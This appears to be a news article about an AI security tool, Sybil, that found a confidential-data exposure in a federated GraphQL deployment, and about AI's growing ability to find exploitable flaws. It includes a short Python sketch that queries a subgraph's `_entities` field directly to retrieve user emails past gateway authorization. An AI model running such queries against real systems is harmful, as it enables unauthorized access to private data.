AI models are getting so good at finding vulnerabilities that some experts say the tech industry might need to rethink how software is built.
Vlad Ionescu and Ariel Herbert-Voss, cofounders of the cybersecurity startup RunSybil, were momentarily confused when their AI tool, Sybil, alerted them to a weakness in a customer’s systems last November.
Sybil uses a mix of different AI models—as well as a few proprietary technical tricks—to scan computer systems for issues that hackers might exploit, like an unpatched server or a misconfigured database.
In this case, Sybil flagged a problem with the customer’s deployment of federated GraphQL, an architecture that stitches multiple GraphQL APIs (GraphQL is a query language for accessing data over the web through application programming interfaces) into a single graph. The issue meant that the customer was inadvertently exposing confidential information.
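The article does not specify the exact flaw, but a minimal sketch of one well-known class of federated GraphQL exposure gives a sense of what this kind of misconfiguration can look like. In Apollo-style federation, each subgraph exposes an `_entities` field so the gateway can resolve references across services; if a subgraph is reachable directly, that same field can be queried without the gateway’s authorization checks. The endpoint URL, the `User` type, and the `email` field below are all hypothetical.

```python
# Illustrative sketch only: a known federated GraphQL exposure pattern,
# not necessarily the issue Sybil found. Assumes a hypothetical subgraph
# at https://internal.example.com/graphql that is reachable directly,
# bypassing gateway-level authorization.
import requests

# Federation subgraphs expose `_entities(representations: [_Any!]!)` so the
# gateway can resolve entity references across services. Queried directly,
# it can return fields the gateway would normally restrict.
query = """
query ($reps: [_Any!]!) {
  _entities(representations: $reps) {
    ... on User {
      id
      email
    }
  }
}
"""

variables = {
    # An entity reference: typename plus the key fields needed to resolve it.
    "reps": [{"__typename": "User", "id": "1"}]
}

resp = requests.post(
    "https://internal.example.com/graphql",
    json={"query": query, "variables": variables},
    timeout=10,
)
print(resp.json())
```

The point of the sketch is that nothing here exploits a bug in GraphQL itself; the exposure comes from how several correctly functioning pieces (gateway, subgraphs, network reachability) interact, which is the kind of cross-system reasoning the founders describe.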
What puzzled Ionescu and Herbert-Voss was that spotting the issue required a remarkably deep knowledge of several different systems and how those systems interact. RunSybil says it has since found the same problem in other deployments of GraphQL, before anybody else made it public. “We scoured the internet, and it didn’t exist,” Herbert-Voss says. “Discovering it was a reasoning step in terms of models’ capabilities—a step change.”
The situation points to a growing risk. As AI models continue to get smarter, their ability to find zero-day bugs and other vulnerabilities also continues to grow. The same intelligence that can be used to detect vulnerabilities can also be used to exploit them.
...read more at archive.is